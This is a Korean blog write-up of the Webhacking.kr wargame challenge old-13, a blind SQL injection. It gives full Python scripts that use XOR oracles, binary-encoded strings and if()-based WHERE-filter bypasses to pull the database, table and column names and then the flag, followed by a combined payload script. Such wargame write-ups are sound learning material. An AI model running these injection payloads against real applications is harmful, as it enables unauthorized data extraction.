![[Webhacking.kr] Challenge old-13 write-up](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FMtoFS%2Fbtr5Tm4gnsg%2FVPd2o8I8ZoidcOA0Hio7zk%2Fimg.png)
sql injection 문제입니다.
1을 입력하면 1이 뜨고 그 외에는 0을 출력해주므로 blind sql injection임을 알 수 있습니다.
필터링되지 않는 문자들을 직접 찾아서 활용해야 합니다.
비트 연산자 중 ^(XOR) 연산자를 필터링하지 않습니다.
먼저 데이터베이스를 구해줍니다.
XOR 연산에서 원하는 값을 구하기 위해 간단한 함수를 구현했습니다.
def calc(num):
if num % 2 == 0:
return num + 1
else:
return num - 1
db 이름 길이를 찾아줍니다.
db_length = 0
while True:
db_length += 1
query = f'?no=(length(database())^{db_length})'
print(db_length, end=',')
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
db_length = calc(db_length)
print("db_length:", db_length)
break1,2,3,4,5,6,db_length: 7
db 이름을 찾아줍니다.
db_name = ''
for i in range(1, db_length+1):
print(i, end=': ')
for k in range(127, 47, -1):
print(k, end=',')
query = f'?no=ord(substr(database(),{i},1))^{k}'
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
db_name += chr(calc(k))
print(f" {i}'s db_name:", chr(calc(k)))
break
print(db_name)1: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98, 1's db_name: c
2: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105, 2's db_name: h
3: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96, 3's db_name: a
4: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109, 4's db_name: l
5: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109, 5's db_name: l
6: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50,49,48, 6's db_name: 1
7: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50, 7's db_name: 3
chall13
이제 테이블에 관련된 정보를 찾아야하는데 이 부분에서 막혀서 라이트업을 살짝 봤습니다.
문자열 전달이 되지 않을 때 이진수를 활용해서도 전달할 수 있었습니다.
또한 if 문을 활용해 where 필터링을 우회할 수 있으며
서브쿼리의 결과를 하나로 지정해주기 위해 max, min, group_concat 함수를 활용할 수 있습니다.
테이블 개수를 찾아줍니다.
table_count = 0
while True:
table_count += 1
query = f'?no=(select(count(if((table_schema)in(0b01100011011010000110000101101100011011000011000100110011),table_name,null)))from(information_schema.tables))^{table_count}'
print(table_count, end=',')
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
table_count = calc(table_count)
print("table count:", table_count)
break
1,2,3,table count: 2
테이블 이름 길이를 찾아줍니다.
table_len = 0
while True:
table_len += 1
query = f'?no=(select(length(min(if((table_schema)in(0b01100011011010000110000101101100011011000011000100110011),table_name,null))))from(information_schema.tables))^{table_len}'
print(table_len, end=',')
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
table_len = calc(table_len)
print("table len:", table_len)
break1,2,3,4,5,6,7,8,9,10,11,12,table len: 13
테이블 이름을 찾아줍니다.
(max로 찾은 이름은 list)
table_name = ''
for i in range(1, table_len+1):
print(i, end=': ')
for k in range(127, 47, -1):
print(k, end=',')
query = f'?no=(select(ord(substr(min(if((table_schema)in(0b01100011011010000110000101101100011011000011000100110011),table_name,null)),{i},1)))from(information_schema.tables))^{k}'
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
table_name += chr(calc(k))
print(f" {i}'s table_name:", chr(calc(k)))
break
print(table_name)1: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103, 1's table_name: f
2: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109, 2's table_name: l
3: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96, 3's table_name: a
4: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102, 4's table_name: g
5: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94, 5's table_name: _
6: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96, 6's table_name: a
7: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99, 7's table_name: b
8: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54, 8's table_name: 7
9: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50, 9's table_name: 3
10: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50, 10's table_name: 3
11: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54, 11's table_name: 7
12: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55, 12's table_name: 6
13: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57, 13's table_name: 8
flag_ab733768
칼럼의 개수를 찾아줍니다.
(list 테이블은 칼럼의 개수가 0개 입니다.. 삽질..)
col_count = 0
while True:
query = f'?no=(select(count(if((table_name)in(0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000),column_name,null)))from(information_schema.columns))^{col_count}'
print(col_count, end=',')
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
col_count = calc(col_count)
print(" col_count:", col_count)
break
col_count += 10, col_count: 1
칼럼의 길이를 찾아줍니다.
col_len = 0
while True:
col_len += 1
query = f'?no=(select(length(max(if((table_name)in(0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000),column_name,null))))from(information_schema.columns))^{col_len}'
print(col_len, end=',')
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
col_len = calc(col_len)
print(" col_len:", col_len)
break1,2,3,4,5,6,7,8,9,10,11,12, col_len: 13
칼럼의 이름을 찾아줍니다.
col_name = ''
for i in range(1, col_len+1):
print(i, end=': ')
for k in range(127, 47, -1):
print(k, end=',')
query = f'?no=(select(ord(substr(max(if((table_name)in(0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000),column_name,null)),{i},1)))from(information_schema.columns))^{k}'
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
col_name += chr(calc(k))
print(f" {i}'s col_name:", chr(calc(k)))
break
print(col_name)1: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103, 1's col_name: f
2: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109, 2's col_name: l
3: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96, 3's col_name: a
4: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102, 4's col_name: g
5: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94, 5's col_name: _
6: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50, 6's col_name: 3
7: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96, 7's col_name: a
8: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52, 8's col_name: 5
9: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52, 9's col_name: 5
10: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99, 10's col_name: b
11: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50, 11's col_name: 3
12: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50,49,48, 12's col_name: 1
13: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101, 13's col_name: d
flag_3a55b31d
데이터 레코드 개수를 조회합니다.
data_count = 0
while True:
query = f'?no=(select(count((flag_3a55b31d)))from(flag_ab733768))^{data_count}'
print(data_count,end=',')
re = requests.post(f'{host}{query}',cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
data_count = calc(data_count)
print(" data_count:",data_count)
break
data_count += 10,1,2,3, data_count: 2
데이터의 길이를 찾아줍니다.
(min과 max를 비교해서 더 큰 친구가 플래그일 것으로 예상해서 접근)
data_len = 0
while True:
query = f'?no=(select(length(max(flag_3a55b31d)))from(flag_ab733768))^{data_len}'
print(data_len, end=',')
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
data_len = calc(data_len)
print(" data_len:", data_len)
break
data_len += 10,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, data_len: 27
마지막으로 레코드 값을 조회해 플래그를 찾아냅니다.
flag = ''
for i in range(1, data_len+1):
print(i, end=': ')
for k in range(127, 47, -1):
print(k, end=',')
query = f'?no=(select(ord(substr(max(flag_3a55b31d),{i},1)))from(flag_ab733768))^{k}'
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
flag += chr(calc(k))
print(f" {i}'s data:", chr(calc(k)))
break
print(flag)1: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71, 1's data: F
2: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77, 2's data: L
3: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64, 3's data: A
4: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70, 4's data: G
5: 127,126,125,124,123,122, 5's data: {
6: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98, 6's data: c
7: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105, 7's data: h
8: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96, 8's data: a
9: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109, 9's data: l
10: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109, 10's data: l
11: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100, 11's data: e
12: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111, 12's data: n
13: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102, 13's data: g
14: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100, 14's data: e
15: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50,49,48, 15's data: 1
16: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50, 16's data: 3
17: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102, 17's data: g
18: 127,126,125,124,123,122,121,120,119,118,117,116, 18's data: u
19: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108, 19's data: m
20: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108, 20's data: m
21: 127,126,125,124,123,122,121,120, 21's data: y
22: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98, 22's data: c
23: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109, 23's data: l
24: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100, 24's data: e
25: 127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96, 25's data: a
26: 127,126,125,124,123,122,121,120,119,118,117,116,115, 26's data: r
27: 127,126,125,124, 27's data: }
FLAG{challenge13gummyclear}
끝!
레퍼런스
웹해킹 SQLI 우회기법 정리 - Webhacking SQL Injection Bypass Honey Tips
지금까지 웹해킹 워게임을 풀면서 깨달은(?) 우회기법을 정리하려 합니다.모두 수기로 기억나는대로 작성하다보니 빠진 부분도 있을 것 같습니다.기억나는대로 추가해서 수정하겠습니다. - or, a
ar9ang3.tistory.com
페이로드 종합본
import requests
host = "https://webhacking.kr/challenge/web-10/"
cookie = {'PHPSESSID': ''}
'''
['0x9', '0xa', '0xb', '0xc', '0xd', '0x20', '0x2a', '0x2b', '0x2d', '0x2f', '0x3c', '0x3d', '0x3e', '0x40', '0x7c']
['\t', '\n', '\x0b', '\x0c', '\r', ' ', '*', '+', '-', '/', '<', '=', '>', '@', '|']
union, like, where, and, limit, char, ascii
'''
def calc(num):
if num % 2 == 0:
return num + 1
else:
return num - 1
db_length = 0
while True:
db_length += 1
query = f'?no=(length(database())^{db_length})'
print(db_length, end=',')
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
db_length = calc(db_length)
print("db_length:", db_length)
break
db_name = ''
for i in range(1, db_length+1):
print(i, end=': ')
for k in range(127, 47, -1):
print(k, end=',')
query = f'?no=ord(substr(database(),{i},1))^{k}'
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
db_name += chr(calc(k))
print(f" {i}'s db_name:", chr(calc(k)))
break
print(db_name)
# (select(count(if((table_schema)in(0b01100011011010000110000101101100011011000011000100110011),table_name,0)))from(information_schema.tables))
table_count = 0
while True:
table_count += 1
query = f'?no=(select(count(if((table_schema)in(0b01100011011010000110000101101100011011000011000100110011),table_name,null)))from(information_schema.tables))^{table_count}'
print(table_count, end=',')
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
table_count = calc(table_count)
print("table count:", table_count)
break
# 'chall13' == 0b01100011011010000110000101101100011011000011000100110011
table_len = 0
while True:
table_len += 1
query = f'?no=(select(length(min(if((table_schema)in(0b01100011011010000110000101101100011011000011000100110011),table_name,null))))from(information_schema.tables))^{table_len}'
print(table_len, end=',')
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
table_len = calc(table_len)
print("table len:", table_len)
break
table_name = ''
for i in range(1, table_len+1):
print(i, end=': ')
for k in range(127, 47, -1):
print(k, end=',')
query = f'?no=(select(ord(substr(min(if((table_schema)in(0b01100011011010000110000101101100011011000011000100110011),table_name,null)),{i},1)))from(information_schema.tables))^{k}'
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
table_name += chr(calc(k))
print(f" {i}'s table_name:", chr(calc(k)))
break
print(table_name)
# (select(count(if((table_name)in(0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000),column_name,null)))from(information_schema.columns))
# flag_ab733768 == 0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000
col_count = 0
while True:
query = f'?no=(select(count(if((table_name)in(0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000),column_name,null)))from(information_schema.columns))^{col_count}'
print(col_count, end=',')
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
col_count = calc(col_count)
print(" col_count:", col_count)
break
col_count += 1
# select(length(max(if((table_name)in("scientist"),column_name,null))))from(information_schema.columns)
col_len = 0
while True:
col_len += 1
query = f'?no=(select(length(max(if((table_name)in(0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000),column_name,null))))from(information_schema.columns))^{col_len}'
print(col_len, end=',')
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
col_len = calc(col_len)
print(" col_len:", col_len)
break
col_name = ''
for i in range(1, col_len+1):
print(i, end=': ')
for k in range(127, 47, -1):
print(k, end=',')
query = f'?no=(select(ord(substr(max(if((table_name)in(0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000),column_name,null)),{i},1)))from(information_schema.columns))^{k}'
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
col_name += chr(calc(k))
print(f" {i}'s col_name:", chr(calc(k)))
break
print(col_name)
# table: flag_ab733768
# column: flag_3a55b31d
data_count = 0
while True:
query = f'?no=(select(count((flag_3a55b31d)))from(flag_ab733768))^{data_count}'
print(data_count, end=',')
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
data_count = calc(data_count)
print(" data_count:", data_count)
break
data_count += 1
data_len = 0
while True:
query = f'?no=(select(length(max(flag_3a55b31d)))from(flag_ab733768))^{data_len}'
print(data_len, end=',')
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
data_len = calc(data_len)
print(" data_len:", data_len)
break
data_len += 1
flag = ''
for i in range(1, data_len+1):
print(i, end=': ')
for k in range(127, 47, -1):
print(k, end=',')
query = f'?no=(select(ord(substr(max(flag_3a55b31d),{i},1)))from(flag_ab733768))^{k}'
re = requests.post(f'{host}{query}', cookies=cookie)
if '<table border=1 cellpadding=10 width=200>' in re.text:
flag += chr(calc(k))
print(f" {i}'s data:", chr(calc(k)))
break
print(flag)'write-up(web) > webhacking.kr' 카테고리의 다른 글
| [Webhacking.kr] baby toctou write-up (0) | 2023.04.05 |
|---|---|
| [Webhacking.kr] Challenge old-60 write-up (0) | 2023.04.05 |
| [Webhacking.kr] Challenge old-40 write-up (1) | 2023.01.19 |
| [Webhacking.kr] Challenge old-48 write-up (0) | 2023.01.18 |
| [Webhacking.kr] Challenge old-37 write-up (0) | 2022.12.26 |